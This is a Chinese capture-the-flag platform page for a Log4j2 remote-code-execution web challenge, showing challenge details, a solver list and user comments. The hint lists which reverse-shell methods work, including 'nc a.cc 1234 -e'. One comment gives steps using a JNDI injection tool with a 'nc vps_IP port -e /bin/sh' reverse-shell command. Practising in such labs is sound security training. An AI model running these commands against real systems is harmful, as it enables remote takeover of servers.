Apache Log4j2 RCEWEB 未解决
分数:
25
金币:
3
题目作者:
云牧青
一 血:
yeedo
一血奖励:
8金币
解 决:
480
提 示:
人太多了服务器性能有点满了,启动不起来的 过一会再启动就可以了。
描 述:
/bin/bash:x ;
/bin/sh √ ;
/dev/tcp × ;
nc -e x ;
nc a.cc 1234 -e √ ;
评分(6)
解题动态
![](/upload/user/20220326/13b7387c04b5941583e61347dfcf219c.webp)
V5nDett4 攻破了该题 9天前
![](/static/images/face.webp)
Fanllspd 攻破了该题 12天前
![](/static/images/face.webp)
xiuliyeer1 攻破了该题 1月前
![](/upload/user/20230615/8d315f8affab40bf36b86f4714dcb629.webp)
dsfaadsfa 攻破了该题 1月前
![](/static/images/face.webp)
beicheng 攻破了该题 2月前
![](/static/images/face.webp)
nock 攻破了该题 3月前
![](/static/images/face.webp)
Wencf01 攻破了该题 3月前
![](/static/images/face.webp)
菜包子1223 攻破了该题 3月前
![](/static/images/face.webp)
Lsettings 攻破了该题 3月前
![](/static/images/face.webp)
Westdoor 攻破了该题 3月前
![](/upload/user/20230504/6841b9a83707aaf2c5ea738f23da9a65.webp)
zfny 攻破了该题 3月前
![](/static/images/face.webp)
15614005380 攻破了该题 4月前
![](/static/images/face.webp)
hacker007i 攻破了该题 4月前
![](/static/images/face.webp)
BinPr1me 攻破了该题 4月前
![](/static/images/face.webp)
JNDL 攻破了该题 5月前
![](/static/images/face.webp)
unkownowo 攻破了该题 5月前
![](/upload/user/20211213/900d37b94b2722d6e3684c46c040cdbe.webp)
Ir1d1um 攻破了该题 5月前
![](/static/images/face.webp)
iven 攻破了该题 5月前
![](/upload/user/20240110/ecab721ce329ba23174c61895aff66b4.webp)
king2024 攻破了该题 5月前
![](/static/images/face.webp)
评论
genius4282 8月前
举报
裂开,不如自己搭建个本地的复现效率高,同样的步骤,在这里就搞不了还麻烦
ctfliu 1年前
举报
不懂,跟着流程走的。阿里云开启虚拟linux,在安全组规则放开所有端口。根据别人的wp走就行。
xiaopengy 1年前
举报
请问反弹shell的时候vps端为什么报这个错? 我的vps机是kali的系统。 java.lang.IllegalAccessError: superclass access check failed: class com.feihong.ldap.template.TomcatEchoTemplate (in unnamed module @0x5e91993f) cannot access
Striker123456 1年前
举报
弹回的shell执行不了命令,不知道是不是我的服务器的问题
jack12138 1年前
举报
dnslog出不来,但是可以弹shell,估计是禁用dns请求啦?
Wencf01 3月前
举报
我也是能弹shell,但是弹不dnslog
Striker123456 1年前
举报
必须要外网的VPS么
Striker123456 1年前
举报
@简单的很遗憾 哎哎,我的意思是公网地址的VPS也可以把
简单的很遗憾 1年前
举报
这个是需要的,没有vps可以vulhub本地复现嘛
1317554973 1年前
举报
什么靶场啊 我都用了6金币都没成功 我百度上找一个靶场就直接成功了 骗我金币 搞毛啊
13633953641aaa 1年前
举报
有没有师傅遇到vps开启ldap后 telnet -p 不通的问题
SecI302 1年前
举报
1.通过ceye是无法判断是否存在漏洞的,但是能正常反弹shell 2.下载JNDI注入工具 3. 启动工具命令java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc vps_IP port -e /bin/sh" -A vps_IP启动rmi或者ldap服务设置IP工具会返回服务地址的(红色的) 4.复
mamba24 1年前
举报
最后一步了 端口都是通的 就是弹不回来